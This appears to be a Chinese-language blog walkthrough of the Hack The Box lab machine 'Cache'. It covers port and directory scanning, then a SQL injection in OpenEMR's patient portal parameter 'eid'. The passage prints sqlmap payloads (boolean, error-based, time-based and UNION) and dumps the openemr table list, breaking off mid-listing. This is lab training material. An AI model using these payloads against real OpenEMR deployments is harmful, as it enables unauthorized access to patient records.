Lluna's Pure land.

What is life like when singing to wine?

0%

HTB-[cache]

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 51k 阅读时长 ≈ 47 分钟

0x00.概述

0x01.信息收集

仅仅开放了22/80端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@JIYE:~/htb/cache# nmap -sC -sV -sT 10.10.10.188 -oN nmap.CVT
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 05:02 EDT
Nmap scan report for 10.10.10.188
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.34 seconds
root@JIYE:~/htb/cache#

0x02.先访问80端口

1.可以看到这是一个介绍hacker的网站

2.点击author发现作者是ASH

3.尝试使用弱口令登入,返回结果为网站正在建设中

4.发现功能js文件,点击审查

5.发现用户名与密码

0x03.登入

返回结果依然是正在建设中

0x04.修改hosts文件

1.前面提示查看ASH的其他项目例如HMS,所以添加一条记录

1
10.10.10.188    hms.htb

2.访问hms.htb

尝试ash登入,但登入失败,CMS为OpenEmr

0x05.扫描hms.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
root@JIYE:~# dirb http://hms.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Oct  1 08:38:25 2020
URL_BASE: http://hms.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://hms.htb/ ----
+ http://hms.htb/admin.php (CODE:200|SIZE:937)                                       
==> DIRECTORY: http://hms.htb/common/                                               
==> DIRECTORY: http://hms.htb/config/                                               
==> DIRECTORY: http://hms.htb/contrib/                                               
==> DIRECTORY: http://hms.htb/controllers/                                           
==> DIRECTORY: http://hms.htb/custom/                                               
==> DIRECTORY: http://hms.htb/images/                                              
+ http://hms.htb/index.php (CODE:302|SIZE:0)                                         
==> DIRECTORY: http://hms.htb/interface/                                             
==> DIRECTORY: http://hms.htb/javascript/                                           
==> DIRECTORY: http://hms.htb/library/                                               
+ http://hms.htb/LICENSE (CODE:200|SIZE:35147)                                       
==> DIRECTORY: http://hms.htb/modules/                                               
==> DIRECTORY: http://hms.htb/portal/                                               
==> DIRECTORY: http://hms.htb/public/                                               
+ http://hms.htb/server-status (CODE:403|SIZE:272)                                   
==> DIRECTORY: http://hms.htb/services/                                             
==> DIRECTORY: http://hms.htb/sites/                                                 
==> DIRECTORY: http://hms.htb/sql/                                                   
==> DIRECTORY: http://hms.htb/templates/                                            
==> DIRECTORY: http://hms.htb/tests/                                                 
==> DIRECTORY: http://hms.htb/vendor/
......

0x06.手动爬虫,发现protal目录

Goolge发现存在sql injection地址

0x07.抓包

1
2
3
4
5
6
7
8
9
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=00b20ha34nukojgrtj0mvigfrk; PHPSESSID=ogdqnggoo752nheh5upb7qo5mo
Upgrade-Insecure-Requests: 1

0x08.sqlmap利用

1.得到数据库openemr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
root@JIYE:~/htb/cache# cat bp
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OpenEMR=00b20ha34nukojgrtj0mvigfrk; PHPSESSID=ogdqnggoo752nheh5upb7qo5mo
Upgrade-Insecure-Requests: 1
root@JIYE:~/htb/cache# sqlmap -r bp --dbs --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:53:26 /2020-10-01/

[09:53:26] [INFO] parsing HTTP request from 'bp'
[09:53:26] [INFO] testing connection to the target URL
[09:53:27] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[09:53:27] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:53:28] [INFO] testing if the target URL content is stable
[09:53:29] [INFO] target URL content is stable
[09:53:29] [INFO] testing if GET parameter 'eid' is dynamic
[09:53:29] [WARNING] GET parameter 'eid' does not appear to be dynamic
[09:53:30] [INFO] heuristic (basic) test shows that GET parameter 'eid' might be injectable (possible DBMS: 'MySQL')
[09:53:30] [INFO] testing for SQL injection on GET parameter 'eid'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:53:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:53:30] [WARNING] reflective value(s) found and filtering out
[09:53:34] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:53:35] [INFO] GET parameter 'eid' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --not-string="row")
[09:53:35] [INFO] testing 'Generic inline queries'
[09:53:35] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:53:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:53:36] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:53:36] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:53:36] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:53:37] [INFO] GET parameter 'eid' is 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' injectable 
[09:53:37] [INFO] testing 'MySQL inline queries'
[09:53:37] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:53:37] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)                                                     
[09:53:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:53:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:53:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:53:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:53:42] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:53:43] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:53:54] [INFO] GET parameter 'eid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[09:53:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:53:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:53:55] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:53:56] [INFO] target URL appears to have 4 columns in query
[09:53:57] [INFO] GET parameter 'eid' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 47 HTTP(s) requests:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (5601=5601) THEN 1 ELSE (SELECT 8979 UNION SELECT 9885) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: eid=1 AND GTID_SUBSET(CONCAT(0x716b6a6271,(SELECT (ELT(4116=4116,1))),0x7170767071),4116)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: eid=1 AND (SELECT 8798 FROM (SELECT(SLEEP(5)))lAMe)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a6271,0x4f434469514a6974484d5673426553635173764565766e4448467a77536e44577473487571474973,0x7170767071),NULL-- -
---
[09:53:57] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[09:53:59] [INFO] fetching database names
[09:54:00] [INFO] retrieved: 'information_schema'
[09:54:00] [INFO] retrieved: 'openemr'
available databases [2]:                                                                                                                                    
[*] information_schema
[*] openemr

[09:54:00] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/hms.htb'

[*] ending @ 09:54:00 /2020-10-01/

root@JIYE:~/htb/cache#

2.爆表

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
root@JIYE:~/htb/cache# sqlmap -r bp -D openemr --tables --batch
        ___
       __H__                                                                                                                                                 
 ___ ___[,]_____ ___ ___  {1.4.9#stable}                                                                                                                     
|_ -| . [,]     | .'| . |                                                                                                                                    
|___|_  [.]_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   http://sqlmap.org                                                                                                                  

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:57:20 /2020-10-01/

[09:57:20] [INFO] parsing HTTP request from 'bp'
[09:57:20] [INFO] resuming back-end DBMS 'mysql' 
[09:57:20] [INFO] testing connection to the target URL
[09:57:21] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (5601=5601) THEN 1 ELSE (SELECT 8979 UNION SELECT 9885) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: eid=1 AND GTID_SUBSET(CONCAT(0x716b6a6271,(SELECT (ELT(4116=4116,1))),0x7170767071),4116)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: eid=1 AND (SELECT 8798 FROM (SELECT(SLEEP(5)))lAMe)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: eid=1 UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a6271,0x4f434469514a6974484d5673426553635173764565766e4448467a77536e44577473487571474973,0x7170767071),NULL-- -
---
[09:57:21] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.6
[09:57:21] [INFO] fetching tables for database: 'openemr'
[09:57:22] [INFO] retrieved: 'addresses'
[09:57:22] [INFO] retrieved: 'amc_misc_data'
[09:57:22] [INFO] retrieved: 'amendments'
[09:57:23] [INFO] retrieved: 'amendments_history'
[09:57:23] [INFO] retrieved: 'ar_activity'
[09:57:23] [INFO] retrieved: 'ar_session'
[09:57:24] [INFO] retrieved: 'array'
[09:57:24] [INFO] retrieved: 'audit_details'
[09:57:24] [INFO] retrieved: 'audit_master'
[09:57:25] [INFO] retrieved: 'automatic_notification'
[09:57:25] [INFO] retrieved: 'background_services'
[09:57:25] [INFO] retrieved: 'batchcom'
[09:57:26] [INFO] retrieved: 'billing'
[09:57:26] [INFO] retrieved: 'calendar_external'
[09:57:26] [INFO] retrieved: 'categories'
[09:57:27] [INFO] retrieved: 'categories_seq'
[09:57:27] [INFO] retrieved: 'categories_to_documents'
[09:57:27] [INFO] retrieved: 'ccda'
[09:57:28] [INFO] retrieved: 'ccda_components'
[09:57:28] [INFO] retrieved: 'ccda_field_mapping'
[09:57:28] [INFO] retrieved: 'ccda_sections'
[09:57:29] [INFO] retrieved: 'ccda_table_mapping'
[09:57:29] [INFO] retrieved: 'chart_tracker'
[09:57:29] [INFO] retrieved: 'claims'
[09:57:30] [INFO] retrieved: 'clinical_plans'
[09:57:30] [INFO] retrieved: 'clinical_plans_rules'
[09:57:31] [INFO] retrieved: 'clinical_rules'
[09:57:31] [INFO] retrieved: 'clinical_rules_log'
[09:57:31] [INFO] retrieved: 'code_types'
[09:57:32] [INFO] retrieved: 'codes'
[09:57:32] [INFO] retrieved: 'codes_history'
[09:57:33] [INFO] retrieved: 'config'
[09:57:33] [INFO] retrieved: 'config_seq'
[09:57:33] [INFO] retrieved: 'customlists'
[09:57:34] [INFO] retrieved: 'dated_reminders'
[09:57:34] [INFO] retrieved: 'dated_reminders_link'
[09:57:34] [INFO] retrieved: 'direct_message_log'
[09:57:35] [INFO] retrieved: 'documents'
[09:57:35] [INFO] retrieved: 'documents_legal_categories'
[09:57:35] [INFO] retrieved: 'documents_legal_detail'
[09:57:36] [INFO] retrieved: 'documents_legal_master'
[09:57:36] [INFO] retrieved: 'drug_inventory'
[09:57:37] [INFO] retrieved: 'drug_sales'
[09:57:37] [INFO] retrieved: 'drug_templates'
[09:57:37] [INFO] retrieved: 'drugs'
[09:57:38] [INFO] retrieved: 'eligibility_response'
[09:57:38] [INFO] retrieved: 'eligibility_verification'
[09:57:38] [INFO] retrieved: 'employer_data'
[09:57:39] [INFO] retrieved: 'enc_category_map'
[09:57:39] [INFO] retrieved: 'erx_drug_paid'
[09:57:39] [INFO] retrieved: 'erx_narcotics'
[09:57:40] [INFO] retrieved: 'erx_rx_log'
[09:57:40] [INFO] retrieved: 'erx_ttl_touch'
[09:57:41] [INFO] retrieved: 'esign_signatures'
[09:57:41] [INFO] retrieved: 'extended_log'
[09:57:41] [INFO] retrieved: 'external_encounters'
[09:57:42] [INFO] retrieved: 'external_procedures'
[09:57:42] [INFO] retrieved: 'facility'
[09:57:42] [INFO] retrieved: 'facility_user_ids'
[09:57:43] [INFO] retrieved: 'fee_sheet_options'
[09:57:43] [INFO] retrieved: 'form_care_plan'
[09:57:43] [INFO] retrieved: 'form_clinical_instructions'
[09:57:44] [INFO] retrieved: 'form_dictation'
[09:57:44] [INFO] retrieved: 'form_encounter'
[09:57:44] [INFO] retrieved: 'form_eye_mag'
[09:57:45] [INFO] retrieved: 'form_eye_mag_dispense'
[09:57:45] [INFO] retrieved: 'form_eye_mag_impplan'
[09:57:46] [INFO] retrieved: 'form_eye_mag_orders'
[09:57:46] [INFO] retrieved: 'form_eye_mag_prefs'
[09:57:46] [INFO] retrieved: 'form_eye_mag_wearing'
[09:57:47] [INFO] retrieved: 'form_functional_cognitive_status'
[09:57:47] [INFO] retrieved: 'form_group_attendance'
[09:57:48] [INFO] retrieved: 'form_groups_encounter'
[09:57:48] [INFO] retrieved: 'form_misc_billing_options'
[09:57:48] [INFO] retrieved: 'form_observation'
[09:57:49] [INFO] retrieved: 'form_reviewofs'
[09:57:49] [INFO] retrieved: 'form_ros'
[09:57:50] [INFO] retrieved: 'form_soap'
[09:57:51] [INFO] retrieved: 'form_taskman'
[09:57:52] [INFO] retrieved: 'form_vitals'
[09:57:52] [INFO] retrieved: 'forms'
[09:57:52] [INFO] retrieved: 'gacl_acl'
[09:57:53] [INFO] retrieved: 'gacl_acl_sections'
[09:57:53] [INFO] retrieved: 'gacl_acl_seq'
[09:57:53] [INFO] retrieved: 'gacl_aco'
[09:57:54] [INFO] retrieved: 'gacl_aco_map'
[09:57:54] [INFO] retrieved: 'gacl_aco_sections'
[09:57:54] [INFO] retrieved: 'gacl_aco_sections_seq'
[09:57:55] [INFO] retrieved: 'gacl_aco_seq'
[09:57:55] [INFO] retrieved: 'gacl_aro'
[09:57:55] [INFO] retrieved: 'gacl_aro_groups'
[09:57:56] [INFO] retrieved: 'gacl_aro_groups_id_seq'
[09:57:56] [INFO] retrieved: 'gacl_aro_groups_map'
[09:57:56] [INFO] retrieved: 'gacl_aro_map'
[09:57:57] [INFO] retrieved: 'gacl_aro_sections'
[09:57:57] [INFO] retrieved: 'gacl_aro_sections_seq'
[09:57:57] [INFO] retrieved: 'gacl_aro_seq'
[09:57:58] [INFO] retrieved: 'gacl_axo'
[09:57:58] [INFO] retrieved: 'gacl_axo_groups'
[09:57:58] [INFO] retrieved: 'gacl_axo_groups_map'
[09:57:59] [INFO] retrieved: 'gacl_axo_map'
[09:57:59] [INFO] retrieved: 'gacl_axo_sections'
[09:58:00] [INFO] retrieved: 'gacl_groups_aro_map'
[09:58:00] [INFO] retrieved: 'gacl_groups_axo_map'
[09:58:00] [INFO] retrieved: 'gacl_phpgacl'
[09:58:01] [INFO] retrieved: 'geo_country_reference'
[09:58:01] [INFO] retrieved: 'geo_zone_reference'
[09:58:01] [INFO] retrieved: 'globals'
[09:58:02] [INFO] retrieved: 'gprelations'
[09:58:02] [INFO] retrieved: 'groups'
[09:58:02] [INFO] retrieved: 'history_data'
[09:58:03] [INFO] retrieved: 'icd10_dx_order_code'
[09:58:03] [INFO] retrieved: 'icd10_gem_dx_10_9'
[09:58:03] [INFO] retrieved: 'icd10_gem_dx_9_10'
[09:58:04] [INFO] retrieved: 'icd10_gem_pcs_10_9'
[09:58:04] [INFO] retrieved: 'icd10_gem_pcs_9_10'
[09:58:04] [INFO] retrieved: 'icd10_pcs_order_code'
[09:58:05] [INFO] retrieved: 'icd10_reimbr_dx_9_10'
[09:58:05] [INFO] retrieved: 'icd10_reimbr_pcs_9_10'
[09:58:05] [INFO] retrieved: 'icd9_dx_code'
[09:58:06] [INFO] retrieved: 'icd9_dx_long_code'
[09:58:06] [INFO] retrieved: 'icd9_sg_code'
[09:58:06] [INFO] retrieved: 'icd9_sg_long_code'
[09:58:07] [INFO] retrieved: 'immunization_observation'
[09:58:07] [INFO] retrieved: 'immunizations'
[09:58:08] [INFO] retrieved: 'insurance_companies'
[09:58:08] [INFO] retrieved: 'insurance_data'
[09:58:08] [INFO] retrieved: 'insurance_numbers'
[09:58:09] [INFO] retrieved: 'issue_encounter'
[09:58:09] [INFO] retrieved: 'issue_types'
[09:58:09] [INFO] retrieved: 'lang_constants'
[09:58:10] [INFO] retrieved: 'lang_custom'
[09:58:10] [INFO] retrieved: 'lang_definitions'
[09:58:10] [INFO] retrieved: 'lang_languages'
[09:58:11] [INFO] retrieved: 'layout_group_properties'
[09:58:11] [INFO] retrieved: 'layout_options'
[09:58:11] [INFO] retrieved: 'lbf_data'
[09:58:12] [INFO] retrieved: 'lbt_data'
[09:58:12] [INFO] retrieved: 'list_options'
[09:58:12] [INFO] retrieved: 'lists'
[09:58:13] [INFO] retrieved: 'lists_touch'
[09:58:13] [INFO] retrieved: 'log'
[09:58:14] [INFO] retrieved: 'log_comment_encrypt'
[09:58:14] [INFO] retrieved: 'log_validator'
[09:58:14] [INFO] retrieved: 'medex_icons'
[09:58:15] [INFO] retrieved: 'medex_outgoing'
[09:58:15] [INFO] retrieved: 'medex_prefs'
[09:58:15] [INFO] retrieved: 'medex_recalls'
[09:58:16] [INFO] retrieved: 'misc_address_book'
[09:58:16] [INFO] retrieved: 'module_acl_group_settings'
[09:58:16] [INFO] retrieved: 'module_acl_sections'
[09:58:17] [INFO] retrieved: 'module_acl_user_settings'
[09:58:17] [INFO] retrieved: 'module_configuration'
[09:58:17] [INFO] retrieved: 'modules'
[09:58:18] [INFO] retrieved: 'modules_hooks_settings'
[09:58:18] [INFO] retrieved: 'modules_settings'
[09:58:18] [INFO] retrieved: 'multiple_db'
[09:58:19] [INFO] retrieved: 'notes'
[09:58:19] [INFO] retrieved: 'notification_log'
[09:58:19] [INFO] retrieved: 'notification_settings'
[09:58:20] [INFO] retrieved: 'onotes'
[09:58:20] [INFO] retrieved: 'onsite_documents'
[09:58:20] [INFO] retrieved: 'onsite_mail'
[09:58:21] [INFO] retrieved: 'onsite_messages'
[09:58:21] [INFO] retrieved: 'onsite_online'
[09:58:22] [INFO] retrieved: 'onsite_portal_activity'
[09:58:22] [INFO] retrieved: 'onsite_signatures'
[09:58:22] [INFO] retrieved: 'openemr_module_vars'
[09:58:23] [INFO] retrieved: 'openemr_modules'
[09:58:23] [INFO] retrieved: 'openemr_postcalendar_categories'
[09:58:23] [INFO] retrieved: 'openemr_postcalendar_events'
[09:58:24] [INFO] retrieved: 'openemr_postcalendar_limits'
[09:58:24] [INFO] retrieved: 'openemr_postcalendar_topics'
[09:58:24] [INFO] retrieved: 'openemr_session_info'
[09:58:25] [INFO] retrieved: 'patient_access_offsite'
[09:58:25] [INFO] retrieved: 'patient_access_onsite'
[09:58:25] [INFO] retrieved: 'patient_birthday_alert'
[09:58:26] [INFO] retrieved: 'patient_data'
[09:58:26] [INFO] retrieved: 'patient_portal_menu'
[09:58:26] [INFO] retrieved: 'patient_reminders'
[09:58:27] [INFO] retrieved: 'patient_tracker'
[09:58:27] [INFO] retrieved: 'patient_tracker_element'
[09:58:27] [INFO] retrieved: 'payment_gateway_details'
[09:58:28] [INFO] retrieved: 'payments'
[09:58:28] [INFO] retrieved: 'pharmacies'
[09:58:28] [INFO] retrieved: 'phone_numbers'
[09:58:29] [INFO] retrieved: 'pma_bookmark'
[09:58:29] [INFO] retrieved: 'pma_column_info'
[09:58:29] [INFO] retrieved: 'pma_history'
[09:58:30] [INFO] retrieved: 'pma_pdf_pages'
[09:58:30] [INFO] retrieved: 'pma_relation'
[09:58:31] [INFO] retrieved: 'pma_table_coords'
[09:58:31] [INFO] retrieved: 'pma_table_info'
[09:58:31] [INFO] retrieved: 'pnotes'
[09:58:32] [INFO] retrieved: 'prescriptions'
[09:58:32] [INFO] retrieved: 'prices'
[09:58:32] [INFO] retrieved: 'procedure_answers'
[09:58:33] [INFO] retrieved: 'procedure_order'
[09:58:33] [INFO] retrieved: 'procedure_order_code'
[09:58:33] [INFO] retrieved: 'procedure_providers'
[09:58:34] [INFO] retrieved: 'procedure_questions'
[09:58:34] [INFO] retrieved: 'procedure_report'
[09:58:34] [INFO] retrieved: 'procedure_result'
[09:58:35] [INFO] retrieved: 'procedure_type'
[09:58:35] [INFO] retrieved: 'product_registration'
[09:58:35] [INFO] retrieved: 'product_warehouse'
[09:58:36] [INFO] retrieved: 'registry'
[09:58:36] [INFO] retrieved: 'report_itemized'
[09:58:36] [INFO] retrieved: 'report_results'
[09:58:37] [INFO] retrieved: 'rule_action'
[09:58:37] [INFO] retrieved: 'rule_action_item'
[09:58:38] [INFO] retrieved: 'rule_filter'
[09:58:38] [INFO] retrieved: 'rule_patient_data'
[09:58:38] [INFO] retrieved: 'rule_reminder'
[09:58:39] [INFO] retrieved: 'rule_target'
[09:58:39] [INFO] retrieved: 'sequences'
[09:58:39] [INFO] retrieved: 'shared_attributes'
[09:58:40] [INFO] retrieved: 'standardized_tables_track'
[09:58:40] [INFO] retrieved: 'supported_external_dataloads'
[09:58:40] [INFO] retrieved: 'syndromic_surveillance'
[09:58:41] [INFO] retrieved: 'template_users'
[09:58:41] [INFO] retrieved: 'therapy_groups'
[09:58:41] [INFO] retrieved: 'therapy_groups_counselors'
[09:58:42] [INFO] retrieved: 'therapy_groups_participant_attendance'
[09:58:42] [INFO] retrieved: 'therapy_groups_participants'
[09:58:42] [INFO] retrieved: 'transactions'
[09:58:43] [INFO] retrieved: 'user_settings'
[09:58:43] [INFO] retrieved: 'users'
[09:58:43] [INFO] retrieved: 'users_facility'
[09:58:44] [INFO] retrieved: 'users_secure'
[09:58:44] [INFO] retrieved: 'valueset'
[09:58:45] [INFO] retrieved: 'version'
[09:58:45] [INFO] retrieved: 'voids'
[09:58:45] [INFO] retrieved: 'x12_partners'
Database: openemr                                                                                                                                           
[234 tables]
+---------------------------------------+
| array                                 |
| groups                                |
| log                                   |
| version                               |
| addresses                             |
| amc_misc_data                         |
| amendments                            |
| amendments_history                    |
| ar_activity                           |
| ar_session                            |
| audit_details                         |
| audit_master                          |
| automatic_notification                |
| background_services                   |
| batchcom                              |
| billing                               |
| calendar_external                     |
| categories                            |
| categories_seq                        |
| categories_to_documents               |
| ccda                                  |
| ccda_components                       |
| ccda_field_mapping                    |
| ccda_sections                         |
| ccda_table_mapping                    |
| chart_tracker                         |
| claims                                |
| clinical_plans                        |
| clinical_plans_rules                  |
| clinical_rules                        |
| clinical_rules_log                    |
| code_types                            |
| codes                                 |
| codes_history                         |
| config                                |
| config_seq                            |
| customlists                           |
| dated_reminders                       |
| dated_reminders_link                  |
| direct_message_log                    |
| documents                             |
| documents_legal_categories            |
| documents_legal_detail                |
| documents_legal_master                |
| drug_inventory                        |
| drug_sales                            |
| drug_templates                        |
| drugs                                 |
| eligibility_response                  |
| eligibility_verification              |
| employer_data                         |
| enc_category_map                      |
| erx_drug_paid                         |
| erx_narcotics                         |
| erx_rx_log                            |
| erx_ttl_touch                         |
| esign_signatures                      |
| extended_log                          |
| external_encounters                   |
| external_procedures                   |
| facility                              |
| facility_user_ids                     |
| fee_sheet_options                     |
| form_care_plan                        |
| form_clinical_instructions            |
| form_dictation                        |
| form_encounter                        |
| form_eye_mag                          |
| form_eye_mag_dispense                 |
| form_eye_mag_impplan                  |
| form_eye_mag_orders                   |
| form_eye_mag_prefs                    |
| form_eye_mag_wearing                  |
| form_functional_cognitive_status      |
| form_group_attendance                 |
| form_groups_encounter                 |
| form_misc_billing_options             |
| form_observation                      |
| form_reviewofs                        |
| form_ros                              |
| form_soap                             |
| form_taskman                          |
| form_vitals                           |
| forms                                 |
| gacl_acl                              |
| gacl_acl_sections                     |
| gacl_acl_seq                          |
| gacl_aco                              |
| gacl_aco_map                          |
| gacl_aco_sections                     |
| gacl_aco_sections_seq                 |
| gacl_aco_seq                          |
| gacl_aro                              |
| gacl_aro_groups                       |
| gacl_aro_groups_id_seq                |
| gacl_aro_groups_map                   |
| gacl_aro_map                          |
| gacl_aro_sections                     |
| gacl_aro_sections_seq                 |
| gacl_aro_seq                          |
| gacl_axo                              |
| gacl_axo_groups                       |
| gacl_axo_groups_map                   |
| gacl_axo_map                          |
| gacl_axo_sections                     |
| gacl_groups_aro_map                   |
| gacl_groups_axo_map                   |
| gacl_phpgacl                          |
